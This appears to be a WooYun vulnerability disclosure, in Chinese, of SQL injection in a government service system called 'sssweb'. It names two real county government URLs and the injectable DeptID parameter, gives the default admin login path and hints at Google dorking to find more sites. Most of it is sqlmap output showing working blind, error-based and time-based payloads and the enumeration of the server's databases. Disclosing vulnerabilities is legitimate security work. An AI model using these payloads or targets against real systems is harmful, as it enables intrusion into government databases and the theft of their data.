WooYun.org

与前辈是同一套系统~
WooYun: 某通用型政府服务系统多处SQL注入
技术支持：深圳市北斗星科技有限公司
默认后台 sssweb/login.aspx
google hack~

http://www.hengnan.gov.cn/sssweb/DirectoryPublic/main.aspx?DeptID=DA0207'
参数DeptID没有过滤导致注射~

加个'报错

sqlmap跑~

http://www.hengdong.gov.cn/sssweb/DirectoryPublic/Main.aspx?deptid=DDD080’

[11:48:39] [INFO] resuming back-end DBMS 'microsoft sql server'
[11:48:39] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: deptid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: deptid=DDD080' AND 1291=1291 AND 'ayql'='ayql
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: deptid=DDD080' AND 7696=CONVERT(INT,(CHAR(58) CHAR(106) CHAR(118) C
HAR(97) CHAR(58) (SELECT (CASE WHEN (7696=7696) THEN CHAR(49) ELSE CHAR(48) END)
) CHAR(58) CHAR(98) CHAR(122) CHAR(113) CHAR(58))) AND 'SXYc'='SXYc
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: deptid=DDD080' AND 7770=(SELECT COUNT(*) FROM sysusers AS sys1,sysu
sers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6
,sysusers AS sys7) AND 'fYWI'='fYWI
---
[11:48:46] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[11:48:46] [INFO] fetching database names
[11:48:52] [INFO] the SQL query used returns 7 entries
[11:48:55] [INFO] retrieved: dbsssso1
[11:48:57] [INFO] retrieved: master
[11:48:59] [INFO] retrieved: model
[11:49:01] [INFO] retrieved: msdb
[11:49:02] [INFO] retrieved: sapp
[11:49:02] [INFO] retrieved: sssdesk
[11:49:03] [INFO] retrieved: tempdb
available databases [7]:
[*] dbsssso1
[*] master
[*] model
[*] msdb
[*] sapp
[*] sssdesk
[*] tempdb
个别是延时注射。不深入~